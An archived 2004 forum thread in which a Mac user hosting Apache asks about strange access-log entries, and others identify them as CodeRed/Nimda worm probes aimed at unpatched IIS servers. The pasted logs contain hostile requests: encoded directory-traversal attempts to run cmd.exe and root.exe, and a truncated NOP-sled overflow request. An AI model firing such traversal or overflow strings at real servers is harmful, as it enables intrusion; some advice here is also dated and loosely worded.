PDA

View Full Version : Stupid windoz hackers... an annoiance, but should I be worried about my server?



walkingmac
Apr 5, 2004, 04:06 AM
ok... so I take advantage of the fact that I have Apache ready to use on my nice Mac OS X PowerMac and host my own website.

I also like to know what is going on with my site and who is accessing what. So I have my access.log displayed on my desktop with *GeekTool*.

Every so often I get blips like this that also send my CPU screaming for a few minutes.:
12.220.19.2 - - [05/Apr/2004:03:42:48 -0400] "SEARCH /\x90\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\ ...and on and on a couple of thousand times... x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ ...like 10,000 more of these or so.... \x90\x90\x90" 414 363

Is this a flood or something else?

and I get these alot:
12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 302
12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 300
12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324
12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 357
12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 307
12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 307
12.220.22.9 - - [04/Apr/2004:23:13:34 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324
12.220.22.9 - - [04/Apr/2004:23:13:34 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324

I look up the IP address and it says this is somewhere in Lexington KY.
Any help?


Westside guy
Apr 5, 2004, 04:22 AM
This person (or people) is looking for Internet Information Server (Microsoft's Webserver). It's easier to just bang away at any machine listening on port 80 than it is to determine the type of server first. You needn't worry about these sorts of attacks (even if you were running Apache on Windows rather than OS X).

I should amend my first sentence though. They're looking for unpatched IIS boxes, which also would include a lot of Windows desktop boxes since many configurations of NT and 2000 would enable IIS by default.
walkingmac
Apr 5, 2004, 04:28 AM
ok so the endless numbers that eat my CPU for a little bit is ALSO a M$ Webserver thing?
tomf87
Apr 5, 2004, 08:42 AM
This person (or people) is looking for Internet Information Server (Microsoft's Webserver). It's easier to just bang away at any machine listening on port 80 than it is to determine the type of server first. You needn't worry about these sorts of attacks (even if you were running Apache on Windows rather than OS X).

I should amend my first sentence though. They're looking for unpatched IIS boxes, which also would include a lot of Windows desktop boxes since many configurations of NT and 2000 would enable IIS by default.

Actually that looks like the goofy worm that was out not too long ago. Nimda or CodeRed, I can't remember which did what. Most likely, the person doesn't know their machine is infected.
Jeewhizz
Apr 5, 2004, 08:46 AM
You can stop it being logged in your apache log if its bothering you...

More details here: http://forums.ev1servers.net/showthread.php?s=&threadid=3918&highlight=code+AND+red+AND+apache

Jee
7on
Apr 5, 2004, 10:48 AM
Would turning on the firewall stop such attacks to affect CPU speed?
tomf87
Apr 5, 2004, 11:42 AM
Would turning on the firewall stop such attacks to affect CPU speed?

No because the firewall works on the port level (level 4) not level 5, so any port 80 request would be allowed through.
Jeewhizz
Apr 5, 2004, 12:34 PM
depending on how you use it, you could just move apache to say port 81, close port 80 on the firewall, and then access apache via http://127.0.0.1:81/

Jee
walkingmac
Apr 5, 2004, 01:28 PM
It's not that it bothers me that it is logged (i like the fact that I can see whats going on atleast) rather that it is affecting my system's performance. I don't see the value in moving my port. Is it just they are banging away at anything listening to 80 specifically or is it through my website (which ofcourse if on port 80)? How will moving my port to 81 affect my website? Would this then require something different then my current system of updating my IP address to the DNS? (sorry I don't know a whole lot about this stuff besides turning on and setting up services and making the websites :o )
Jeewhizz
Apr 5, 2004, 01:53 PM
well i only use apache/mysql on my PC atm for local testing - and for showing clients their work... so its only accessed from outside the network when i give out a link - so i give out http://MY_IPADDRESS:81/client/index.php

Moving to port 81 would stop most of it, as they will be scanning all ip's on port 80 - which would be blocked by your firewall.

However, if you use your mac as a server alot, then moving to port 81 wouldn't be a good idea ;)
Westside guy
Apr 5, 2004, 02:58 PM
Actually that looks like the goofy worm that was out not too long ago. Nimda or CodeRed, I can't remember which did what. Most likely, the person doesn't know their machine is infected.

You're right; it's CodeRed. So it's a hacker once removed. :D

Would turning on the firewall stop such attacks to affect CPU speed?

I wouldn't worry so much about the system impact; but unfortunately if there's enough traffic it can certainly bog down your internet connection. There's not a lot you personally can do about that; and if you ask your ISP to do something about it they'll probably say "you know, you're not supposed to be running any sort of server on our lines". :p
superbovine
Apr 6, 2004, 01:56 AM
google for how to make a host.deny file and add the ip to your host.deny file.